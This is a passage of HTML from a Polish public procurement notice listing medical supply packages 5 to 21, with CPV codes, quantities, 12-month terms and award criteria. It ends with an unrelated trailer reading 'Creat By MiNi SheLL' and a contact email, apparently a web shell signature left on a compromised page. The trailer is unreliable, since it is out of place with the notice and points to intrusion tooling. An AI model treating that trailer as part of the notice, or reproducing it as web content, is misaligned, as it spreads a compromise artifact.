<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> URZĄDZENIA I PRZYRZĄDY DO TRANSFUZJI I INFUZJI* 
4 pozycje: łącznie 2 490 szt.
*ZAMAWIAJĄCY WYMAGA DOSTARCZENI PRÓBEK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.40.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRODUKTY Z DREWNA CIĘTEGO
1 pozycja: łącznie 6 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.41.91.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CEWNIKI
7 pozycji: łącznie 254 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 33.14.12.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAPIER FOTOCZUŁY, TERMOCZUŁY LUB PAPIER TERMOGRAFICZNY I TEKTURA CPV 22993000-7, CZYNNIKI DIAGNOSTYCZNE
8 pozycji: łącznie 825 rol., 424 opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1, 33.75.10.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET  8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> RĘKAWICE CHIRURGICZNE
4 pozycje: łącznie 350 par, 630 opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JEDNORAZOWE, NIECHEMICZNE ARTYKUŁY MEDYCZNE I HEMATOLOGICZNE
2 pozycje: łącznie 2 opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> URZĄDZENIA MEDYCZNE, SKALPELE I NOŻE CHIRURGICZNE, PRODUKTY Z TWORZYW SZTUCZNYCH, ZESTAWY DO PODAWANIA LEKÓW
16 pozycji: łącznie 73 654 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.14.11-4, 19.52.00.00-7, 33.14.16.24-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WŁÓKNA POJEDYNCZE Z TWORZYW SZTUCZNYCH (RÓŻNE WYROBY WŁÓKIENNICZE Z TWORZYW SZTUCZNYCH), PODKŁADY MEDYCZNE I DOZOWNIK NA PODKŁADY MEDYCZNE
7 pozycji: łącznie 17 622 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.52.50.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TERMOMETRY, JEDNORAZOWE NIECHEMICZNE ARTYKUŁY MEDYCZNE I HEMATOLOGICZNE, BATERIE
4 pozycje: łącznie 110 szt., 50 opak..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.20.00-6, 33.14.10.00-0, 31.42.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MASKI TLENOWE
3 pozycje: łącznie 54 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET 14.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WAGI ELEKTRONICZNE
1 pozycja: łącznie 2 szt.,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.31.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ELEKTRODY DO KARDIOMONITORA
1 pozycja: łącznie 60 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET 16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ELEKTRODY i GŁOWICE
3 pozycje: łącznie 45 opak., 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0, 33.15.82.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET 17.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> URZĄDZENIA DO TERAPII GAZOWEJ I ODDECHOWEJ CPV 33157000-5
4 pozycje: łącznie 131 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.70.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET 18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JEDNORAZOWE ZESTAWY LARYNGOLOGICZNE
2 pozycje: łącznie 610 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET 19.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRABINKI PRZYŁÓŻKOWE
1 pozycja: łącznie 2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET 20.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPIROMETR
1 pozycja: łącznie 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET 21.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILTRY DO LAMPY SOLLUX
2 pozycje: łącznie 12 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com